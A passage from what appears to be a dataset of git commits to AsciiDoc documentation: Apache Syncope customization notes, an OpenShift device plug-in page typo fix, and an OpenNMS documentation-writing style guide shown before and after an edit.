<<push-correlation-rules,push>> \/ <<pull-correlation-rules,pull>> correlation rules\n* <<pull-mode,reconciliation filter builders>>\n* <<tasks-custom,custom tasks>>\n* <<reportlets,reportlets>>\n* <<account-rules,account>> and <<password-rules,password>> rules for policies\n* <<plain,plain schema validators>>\n* <<mapping,mapping item transformers>>\n* <<virtual-attribute-cache,virtual attribute cache>>\n* <<workflow-adapters,workflow adapters>>\n* <<provisioning-managers,provisioning managers>>\n* <<notifications,notification recipient providers>>\n\n[[new-rest-endpoints]]\n[TIP]\n.New REST endpoints\n====\nAdding a new REST endpoint involves several operations:\n\n. 
create - in an extension's `rest-api` module or under `common` otherwise - a Java interface with package\n`org.apache.syncope.common.rest.api.service` and proper JAX-RS annotations; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nfor reference;\n. if needed, define supporting payload objects - in an extension's `common-lib` module or under `common` otherwise;\ncheck\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nfor reference;\n. implement - in an extension's `rest-cxf` module or under `core` otherwise - the interface defined above in a Java\nclass with package `org.apache.syncope.core.rest.cxf.service`; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nfor reference.\n\nBy following such conventions, the new REST endpoint will be automatically picked up alongside the default services.\n====\n\n[WARNING]\n====\nThe <<override-behavior,override behavior>> might have exceptions; if you need to customize one of the\nSpring context definitions. For example, if you want to customize \nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\n, you will also need to replace the following text in `core\/src\/main\/webapp\/WEB-INF\/web.xml`,\n\n....\nclasspath*:\/*Context.xml\n....\n\nwith\n\n....\nclasspath:\/coreContext.xml\nclasspath:\/securityContext.xml\nclasspath*:\/logicContext.xml\nclasspath*:\/restCXFContext.xml\nclasspath*:\/persistenceContext.xml\nclasspath*:\/provisioningContext.xml\nclasspath*:\/workflowContext.xml\n....\n\nto be sure that `core\/src\/main\/resources\/securityContext.xml` is picked up. 
+\nPlease also note that the actual list of Spring context files to include might depend on the configured extensions.\n====\n\n[discrete]\n===== Select the <<activiti-user-workflow-adapter>>\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.core<\/groupId>\n <artifactId>syncope-core-workflow-activiti<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/workflow.properties` to `core\/src\/main\/resources\/workflow.properties`.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependencies to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-rest-cxf<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-persistence-jpa<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-provisioning<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/provisioning.properties` to `core\/src\/main\/resources\/provisioning.properties`.\n\n[discrete]\n===== Enable the <<swagger>> extension\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext<\/groupId>\n <artifactId>syncope-ext-swagger-ui<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\n[[customization-console]]\n==== Console\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.client.console`, otherwise they will not be\navailable at runtime.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependency to `console\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-client-console<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency> \n----\n\n[[customization-enduser]]\n==== Enduser\n\nGiven the nature of the <<enduser-application>>, all the files required by the AngularJS-based frontend to run are\ngenerated under the local project's `enduser\/src\/main\/webapp\/app\/` directory and are available for full customization.\n\nThe files in use by the Apache Wicket-based backend are still subject to the general\n<<override-behavior,override behavior>>, instead.\n\n[[customization-extensions]]\n==== Extensions\n\n<<extensions>> can be part of a local project, to encapsulate special features which are specific to a given deployment.\n\nFor example, the http:\/\/www.chorevolution.eu\/[CHOReVOLUTION^] IdM - based on Apache Syncope - provides\nhttps:\/\/tuleap.ow2.org\/plugins\/git\/chorevolution\/syncope?p=syncope.git&a=tree&f=ext\/choreography[an extension^]\nfor managing via the <<core>> and visualizing via the <<admin-console-component>> the running choreography instances.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e54c5101184547bfe423fe5e6aac8a54b9403cc5","subject":"Fix typo","message":"Fix typo\n\n- 
https:\/\/github.com\/openshift\/openshift-docs\/issues\/21094\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"nodes\/pods\/nodes-pods-plugins.adoc","new_file":"nodes\/pods\/nodes-pods-plugins.adoc","new_contents":":context: nodes-pods-device\n[id=\"nodes-pods-device\"]\n= Using device plug-ins to access external resources with pods\ninclude::modules\/common-attributes.adoc[]\n\ntoc::[]\n\n\nDevice plug-ins allow you to use a particular device type (GPU, InfiniBand,\nor other similar computing resources that require vendor-specific initialization\nand setup) in your {product-title} pod without needing to write custom code. \n\n\n\/\/ The following include statements pull in the module files that comprise\n\/\/ the assembly. Include any combination of concept, procedure, or reference\n\/\/ modules required to cover the user story. You can also include other\n\/\/ assemblies.\n\ninclude::modules\/nodes-pods-plugins-about.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-device-mgr.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-install.adoc[leveloffset=+1]\n\n","old_contents":":context: nodes-pods-device\n[id=\"nodes-pods-device\"]\n= Using device plug-ins to access external resouces with pods\ninclude::modules\/common-attributes.adoc[]\n\ntoc::[]\n\n\nDevice plug-ins allow you to use a particular device type (GPU, InfiniBand,\nor other similar computing resources that require vendor-specific initialization\nand setup) in your {product-title} pod without needing to write custom code. \n\n\n\/\/ The following include statements pull in the module files that comprise\n\/\/ the assembly. Include any combination of concept, procedure, or reference\n\/\/ modules required to cover the user story. You can also include other\n\/\/ assemblies.\n\ninclude::modules\/nodes-pods-plugins-about.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-device-mgr.adoc[leveloffset=+1]\n\ninclude::modules\/nodes-pods-plugins-install.adoc[leveloffset=+1]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"535e83bb7000ab32d5af50c5460696fa806c2100","subject":"Replaced all the neo4j stuff","message":"Replaced all the neo4j stuff\n","repos":"roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/doc-overview\/src\/asciidoc\/overview.adoc","new_file":"opennms-doc\/doc-overview\/src\/asciidoc\/overview.adoc","new_contents":"= Documentation Overview\n\/\/ Authors, seperated by;. 
They might not be shown in the overview but will be generated\nRonny Trommer <ronny@opennms.org>; Markus von R\u00fcden <mvr@opennms.com>\n:ascii-ids:\n\n[[community-docs]]\n== Writing OpenNMS Documentation\n\nNOTE: Other than writing documentation, you can help out by providing comments about improvements or reporting bugs - head over to the http:\/\/issues.opennms.org\/browse\/NMS\/component\/10011[issue tracker for documentation] to do that!\n\nFor how to build the manual see:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documents use the AsciiDoc format, see:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[AsciiDoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nHere you can find other resources to get familiar with AsciiDoc, see:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nThe cheatsheets are really useful!\n\n[[community-docs-overall-flow]]\n== Overall Flow ==\n\nEach (sub)project represents a part of the documentation, which will produce HTML output in the file system.\nThe output is generated in the `target\/generated` sources folder.\nAsciidoc documents have the +.asciidoc+ file extension.\n\nNote that different ways to add documentation work best for different cases:\n\n* Tutorials and How To's should be published on the http:\/\/wiki.opennms.org[OpenNMS Wiki].\nFor example, you might want to describe how to use the Net-SNMP agent and the SNMP monitor from OpenNMS to solve a special use case with OpenNMS.\n\n* The documentation you can find in the source code can be characterized as a non-emotional technical documentation which explains concepts in detail and should be complete.\n\n== File Structure in 'opennms-doc' ==\n\n[options=\"header\", cols=\"e,d\"]\n|========================\n| Directory | Contents\n| doc-overview\/ | module with this overview documentation\n| guide-user\/ | module with the guide for people on how to use and configure OpenNMS\n| guide-admin\/ | module with the guide for administrators optimizing and running OpenNMS\n| guide-development\/ | module with the guide for people who want to develop within OpenNMS\n| guide-install\/ | module with the guide on how to install OpenNMS on different operating systems\n| releasenotes\/ | module with the changelog and release notes\n|========================\n\n== Headings and document structure ==\n\nEach document starts with headings from level zero (the document title).\nEach document should have an id.\nIn some cases sections in the document need to have id's as well; this depends on where they fit in the overall structure.\nTo be able to link to content, it has to have an id. 
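A quick way to spot documents that do not declare any id at all is a plain text search over the sources; a rough sketch - it assumes the +.asciidoc+ sources live below the current directory, and it will not catch ids that are only declared further down inside a document:\n\n[source,bash]\n----\n# list AsciiDoc sources containing no [[...]] id declaration at all\n# (-L prints files WITHOUT a match)\ngrep -rL --include='*.asciidoc' '^\\[\\[' .\n----\n\n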
Missing id's in mandatory places will fail the build.\n\nThis is how a document should start:\n\n[source]\n----\n[[unique-id-verbose-is-ok]]\n= The Document Title =\n----\n\nTo push the headings down to the right level in the output, the +leveloffset+\nattribute is used when including the document inside of another document.\n\nSubsequent headings in a document should use the following syntax:\n\n[source]\n----\n== Subheading ==\n\n... content here ...\n\n=== Subsubheading ===\n\ncontent here ...\n\n----\n\n== Writing ==\n\nPut one sentence on each line.\nThis makes it easy to move content around, and also easy to spot (too) long sentences.\n\n== Gotchas ==\n\n* Always leave a blank line at the end of documents\n (or the title of the next document might end up in the last\n paragraph of the document)\n* As +{}+ are used for Asciidoc attributes, everything inside will be treated as an attribute.\n What you have to do is to escape the opening brace: +\\\\{+.\n If you don't, the braces and the text inside them will be removed without any warning being issued!\n\n== Links ==\n\nTo link to other parts of the manual the id of the target is used.\nThis is how such a reference looks:\n\n[source]\n----\n<<community-docs-overall-flow>>\n----\n\nWhich will render like: <<community-docs-overall-flow>>\n\n[NOTE]\nJust write \"see \\<<target-id>>\" and similar, that should suffice in most cases.\n\nIf you need to link to another document with your own link text, this is what to do:\n\n[source]\n----\n<<target-id, link text that fits in the context>>\n----\n\nNOTE: Having lots of linked text may work well in a web context but is a pain in print, and we aim for both!\n\nExternal links are added like this:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/[Link text here]\n----\n\nWhich renders like: http:\/\/www.opennms.org\/[Link text here]\n\nFor short links it may be better not to add a link text, just do:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/\n----\n\nWhich renders like: http:\/\/www.opennms.org\/\n\nNOTE: It's ok to have a dot right after the URL, it won't be part of the link.\n\n== Text Formatting ==\n\n* \\_Italics_ is rendered as _Italics_ and used for emphasis.\n* \\*Bold* is rendered as *Bold* and used sparingly, for strong emphasis only.\n* \\+methodName()+ is rendered as +methodName()+ and is used for literals as well\n (note: the content between the `+` signs _will_ be parsed).\n* \\`command` is rendered as `command` (typically used for command-line)\n (note: the content between the +`+ signs _will not_ be parsed).\n* Mono\\+\\+space\\++d is rendered as Mono++space++d and is used for monospaced letters.\n* \\'my\/path\/' is rendered as 'my\/path\/' (used for file names and paths).\n* \\\\``Double quoted'' (that is two grave accents to the left and two acute accents to the right) renders as ``Double quoted''.\n* \\`Single quoted' (that is a single grave accent to the left and a single acute accent to the right) renders as `Single quoted'.\n\n== Admonitions ==\n\nThese are very useful and should be used where appropriate.\nChoose from the following (write all caps and no, we can't easily add new ones):\n\nNOTE: Note.\n\nTIP: Tip.\n\nIMPORTANT: Important\n\nCAUTION: Caution\n\nWARNING: Warning\n\nHere's how it's done:\n\n[source]\n----\nNOTE: Note.\n----\n\nA multiline variation:\n\n[source]\n----\n[TIP]\nTiptext.\nLine 2.\n----\n\nWhich is rendered as:\n\n[TIP]\nTiptext.\nLine 2.\n\n== Images ==\n\nIMPORTANT: _All images in the entire manual share the same namespace._\n You know how to 
handle that.\n\n=== Images Files ===\n\nTo include an image file, make sure it resides in the 'images\/' directory relative to the document you're including it from. Then go:\n\n[source]\n----\nimage::opennms-logo.png[]\n----\n\nWhich is rendered as:\n\nimage::opennms-logo.png[]\n\n=== Static Graphviz\/DOT ===\n\nWe use the Graphviz\/DOT language to describe graphs.\nFor documentation see http:\/\/graphviz.org\/.\n\nThis is how to include a simple example graph:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels.svg\"]\n ----\n \"Start node\" -> \"End node\" [label=\"relationship\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels.svg\"]\n----\n\"Start node\" -> \"End node\" [label=\"relationship\"]\n----\n\nHere's an example using some predefined variables available in the build:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n ----\n \"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n \"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n \"A Relationship\" -> \"Start node\" [label=\"has a\"]\n \"A Relationship\" -> \"End node\" [label=\"has a\"]\n \"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n \"Name\" [TEXTNODE]\n \"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n----\n\"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n\"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n\"A Relationship\" -> \"Start node\" [label=\"has a\"]\n\"A Relationship\" -> \"End node\" [label=\"has a\"]\n\"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n\"Name\" [TEXTNODE]\n\"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n----\n\nThe optional second argument given to the dot filter defines the style to use:\n\n* when not defined: Default styling for nodespace examples.\n* +neoviz+: Nodespace view generated by Neoviz.\n* +meta+: Graphs that don't resemble db contents, but rather concepts.\n\nCAUTION: Keywords of the DOT language have to be surrounded by double quotes when used for other purposes.\n The keywords include _node, edge, graph, digraph, subgraph,_ and _strict_.\n\n\n== Attributes ==\n\nCommon attributes you can use in documents:\n\n* \\{opennms-version} - rendered as \"{opennms-version}\"\n* \\{opennms-git-tag} - rendered as \"{opennms-git-tag}\"\n\nThese can substitute part of URLs that point to for example APIdocs or source code.\nNote that opennms-git-tag also handles the case of snapshot\/master.\n\nSample Asciidoc attributes which can be used:\n\n* \\{docdir} - root directory of the documents\n* \\{nbsp} - non-breaking space\n\n== Comments ==\n\nThere's a separate build including comments.\nThe comments show up with a yellow background.\nThis build doesn't run by default, but after a normal build, you can use `make annotated` to build it.\nYou can also use the resulting page to search for content, as the full manual is on a single page.\n\nHere's how to write a comment:\n\n[source]\n----\n\/\/ this is a comment\n----\n\nThe comments are not visible in the normal build.\nComment blocks won't be included in the output of any build at all.\nHere's a comment block:\n\n[source]\n----\n\/\/\/\/\nNote that includes in here will still be processed, but not make it into the output.\nThat is, missing includes here will still break the build!\n\/\/\/\/\n----\n\n== 
Code Snippets ==\n\n=== Explicitly defined in the document ===\n\nWARNING: Use this kind of code snippet as little as possible.\n They are well known to get out of sync with reality after a while.\n\nThis is how to do it:\n\n[source,xml]\n----\n<service name=\"DNS\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"2\" \/>\n <parameter key=\"timeout\" value=\"5000\" \/>\n <parameter key=\"port\" value=\"53\" \/>\n <parameter key=\"lookup\" value=\"localhost\" \/>\n <parameter key=\"fatal-response-codes\" value=\"2,3,5\" \/><!-- ServFail, NXDomain, Refused -->\n <parameter key=\"rrd-repository\" value=\"\/opt\/opennms\/share\/rrd\/response\" \/>\n <parameter key=\"rrd-base-name\" value=\"dns\" \/>\n <parameter key=\"ds-name\" value=\"dns\" \/>\n<\/service>\n----\n\nIf there's no suitable syntax highlighter, just omit the language: +[source]+.\n\nCurrently the following syntax highlighters are enabled:\n\n* Bash\n* Groovy\n* Java\n* JavaScript\n* Python\n* XML\n\nFor other highlighters we could add, see https:\/\/code.google.com\/p\/google-code-prettify\/.\n\n=== Fetched from source code ===\n\nCode can be automatically fetched from source files.\nYou need to define:\n\n* component: the +artifactId+ of the Maven coordinates,\n* source: path to the file inside the jar it's deployed to,\n* classifier: +sources+ or +test-sources+ or any other classifier pointing to the artifact,\n* tag: tag name to search the file for,\n* the language of the code, if a corresponding syntax highlighter is available.\n\nNote that the artifact has to be included as a Maven dependency of the Manual project so that the files can be found.\n\nThe file will be searched for lines including +START SNIPPET: {tag}+ and +END SNIPPET: {tag}+; the lines between those will go into the output.\nBe aware that the tag \"abc\" will match \"abcd\" as well.\nIt's a simple on\/off switch, meaning that multiple occurrences will be assembled into a single code snippet in the output.\nThis behavior can be used to hide away assertions from code examples sourced from tests.\n\nThis is how to define a code snippet inclusion:\n\n[source]\n----\n [snippet,java]\n ----\n component=opennms-examples\n source=org\/opennms\/examples\/JmxDocTest.java\n classifier=test-sources\n tag=getStartTime\n ----\n----\n\nThis is how it renders:\n\n[snippet,java]\n----\ncomponent=opennms-examples\nsource=org\/opennms\/examples\/JmxDocTest.java\nclassifier=test-sources\ntag=getStartTime\n----\n\n\n=== Query Results ===\n\nThere's a special filter for Cypher query results.\nThis is how to tag a query result:\n\n[source]\n----\n .Result\n [queryresult]\n ----\n +----------------------------------+\n | friend_of_friend.name | count(*) |\n +----------------------------------+\n | Ian | 2 |\n | Derrick | 1 |\n | Jill | 1 |\n +----------------------------------+\n 3 rows, 12 ms\n ----\n----\n\nThis is how it renders:\n\n.Result\n[queryresult]\n----\n+----------------------------------+\n| friend_of_friend.name | count(*) |\n+----------------------------------+\n| Ian | 2 |\n| Derrick | 1 |\n| Jill | 1 |\n+----------------------------------+\n3 rows, 12 ms\n----\n\n\n== A sample Java based documentation test ==\n\nFor Java, there are a couple of premade utilities that keep code and documentation together in\nJavadocs and code snippets that generate Asciidoc for the rest of the toolchain.\n\nTo illustrate this, look at the following documentation that generates the Asciidoc file +hello-world-title.asciidoc+ with a content 
of:\n\n[source]\n------------------------------\ninclude::{importdir}\/opennms-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n------------------------------\n\nthis file is included in this documentation via\n\n[source]\n----\n :leveloffset: 3\n include::{importdir}\/opennms-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n----\n\nwhich renders the following chapter:\n\n:leveloffset: 3\n\ninclude::{importdir}\/opennms-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n\n:leveloffset: 2\n\n== Images\n\n.pris-overview.graphml\nimage::images\/pris-overview.png[pris-overview.graphml]\n\n.example.odp\nimage::images\/example.png[example.odp]\n\n","old_contents":"= Documentation Overview\n\/\/ Authors, seperated by;. They might not be shown in the overview but will be generated\nRonny Trommer <ronny@opennms.org>; Markus von R\u00fcden <mvr@opennms.com>\n:ascii-ids:\n\n[[community-docs]]\n== Writing OpenNMS Documentation\n\nNOTE: Other than writing documentation, you can help out by providing comments about improvements or reporting bugs - head over to the http:\/\/issues.opennms.org\/browse\/NMS\/component\/10011[issue tracker for documentation] to do that!\n\nFor how to build the manual see:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documents use the AsciiDoc format, see:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[Aciidoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nHere you can find other resources to get familiar with AsciiDoc, see:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nThe cheatsheets are really useful!\n\n[[community-docs-overall-flow]]\n== Overall Flow ==\n\nEach (sub)project represents a part of the documentation, which will produce a HTML output in the file system.\nThe output is generated in the `target\/generated` sources folder.\nAsciidoc documents have the +.asciidoc+ file extension.\n\nNote that different ways to add documentation works best for different cases:\n\n* Tutorials and How To's should be published on the http:\/\/wiki.opennms.org[OpenNMS Wiki].\nFor example you want to describe how to use the Net-SNMP agent and the SNMP monitor from OpenNMS to solve a special use case with OpenNMS.\n\n* The documentation you can find in the source code can be characterized as a non-emotional technical documentation which explains concepts in detail and should be complete.\n\n== File Structure in 'opennms-doc' ==\n\n[options=\"header\", cols=\"e,d\"]\n|========================\n| Directory | Contents\n| doc-overview\/ | module with this overview documentation\n| guide-user\/ | module with the guide for people how to use and configure OpenNMS\n| guide-admin\/ | module 
with the guide for administrators optimizing and running OpenNMS\n| guide-development\/ | module with the guide for people who want to develop within OpenNMS\n| guide-install\/ | module with the guide how to install OpenNMS on different operating systems\n| releasenotes\/ | module with the changelog and release notes\n|========================\n\n== Headings and document structure ==\n\nEach document starts over with headings from level zero (the document title).\nEach document should have an id.\nIn some cases sections in the document need to have id's as well, this depends on where they fit in the overall structure.\nTo be able to link to content, it has to have an id. Missing id's in mandatory places will fail the build.\n\nThis is how a document should start:\n\n[source]\n----\n[[unique-id-verbose-is-ok]]\n= The Document Title =\n----\n\nTo push the headings down to the right level in the output, the +leveloffset+\nattribute is used when including the document inside of another document.\n\nSubsequent headings in a document should use the following syntax:\n\n[source]\n----\n== Subheading ==\n\n... content here ...\n\n=== Subsubheading ===\n\ncontent here ...\n\n----\n\n== Writing ==\n\nPut one sentence on each line.\nThis makes it easy to move content around, and also easy to spot (too) long sentences.\n\n== Gotchas ==\n\n* Always leave a blank line at the end of documents\n (or the title of the next document might end up in the last\n paragraph of the document)\n* As +{}+ are used for Asciidoc attributes, everything inside will be treated as an attribute.\n What you have to do is to escape the opening brace: +\\\\{+.\n If you don't, the braces and the text inside them will be removed without any warning being issued!\n\n== Links ==\n\nTo link to other parts of the manual the id of the target is used.\nThis is how such a reference looks:\n\n[source]\n----\n<<community-docs-overall-flow>>\n----\n\nWhich will render like: <<community-docs-overall-flow>>\n\n[NOTE]\nJust write \"see \\<<target-id>>\" and similar, that should suffice in most cases.\n\nIf you need to link to another document with your own link text, this is what to do:\n\n[source]\n----\n<<target-id, link text that fits in the context>>\n----\n\nNOTE: Having lots of linked text may work well in a web context but is a pain in print, and we aim for both!\n\nExternal links are added like this:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/[Link text here]\n----\n\nWhich renders like: http:\/\/www.opennms.org\/[Link text here]\n\nFor short links it may be better not to add a link text, just do:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/\n----\n\nWhich renders like: http:\/\/www.opennms.org\/\n\nNOTE: It's ok to have a dot right after the URL, it won't be part of the link.\n\n== Text Formatting ==\n\n* \\_Italics_ is rendered as _Italics_ and used for emphasis.\n* \\*Bold* is rendered as *Bold* and used sparingly, for strong emphasis only.\n* \\+methodName()+ is rendered as +methodName()+ and is used for literals as well\n (note: the content between the `+` signs _will_ be parsed).\n* \\`command` is rendered as `command` (typically used for command-line)\n (note: the content between the +`+ signs _will not_ be parsed).\n* Mono\\+\\+space\\++d is rendered as Mono++space++d and is used for monospaced letters.\n* \\'my\/path\/' is rendered as 'my\/path\/' (used for file names and paths).\n* \\\\``Double quoted'' (that is two grave accents to the left and two acute accents to the right) renders as ``Double quoted''.\n* \\`Single 
quoted' (that is a single grave accent to the left and a single acute accent to the right) renders as `Single quoted'.\n\n== Admonitions ==\n\nThese are very useful and should be used where appropriate.\nChoose from the following (write all caps and no, we can't easily add new ones):\n\nNOTE: Note.\n\nTIP: Tip.\n\nIMPORTANT: Important\n\nCAUTION: Caution\n\nWARNING: Warning\n\nHere's how it's done:\n\n[source]\n----\nNOTE: Note.\n----\n\nA multiline variation:\n\n[source]\n----\n[TIP]\nTiptext.\nLine 2.\n----\n\nWhich is rendered as:\n\n[TIP]\nTiptext.\nLine 2.\n\n== Images ==\n\nIMPORTANT: _All images in the entire manual share the same namespace._\n You know how to handle that.\n\n=== Images Files ===\n\nTo include an image file, make sure it resides in the 'images\/' directory relative to the document you're including it from. Then go:\n\n[source]\n----\nimage::neo4j-logo.png[]\n----\n\nWhich is rendered as:\n\nimage::neo4j-logo.png[]\n\n=== Static Graphviz\/DOT ===\n\nWe use the Graphviz\/DOT language to describe graphs.\nFor documentation see http:\/\/graphviz.org\/.\n\nThis is how to include a simple example graph:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels.svg\"]\n ----\n \"Start node\" -> \"End node\" 